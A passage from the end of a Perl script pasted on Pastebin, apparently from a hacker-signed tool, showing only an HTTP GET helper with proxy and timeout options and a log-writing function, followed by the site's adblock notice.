  598. sub get_content {
  599.     my $timeout = $_[0];
  600.     my $url = $_[1];
  601.     my $ua  = LWP::UserAgent->new(agent => "Mozilla/5.0");
  602.     if ($proxy) { $ua->proxy("http", "http://".$proxy."/"); }
  603.     if ($timeout == 1) { $ua->timeout(10); }
  604.     my $req = HTTP::Request->new(GET => 'http://'.$url);
  605.     my $response = $ua->request($req);
  606.     if ($timeout == 1) { if ($response->is_error) { print "\n [$logo] [timeout]\n"; }}
  607.     return $response->content;
  608. }
  609.  
  610. sub w_log {
  611.     my $data = $_[0];
  612.     open(LOG,">>$log") or die(" [!] Cannot create or open log file.\n\n");
  613.     print LOG "$data";
  614.     close(LOG);
  615. }
  616.  
  617. # c0li.m0de.0n
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×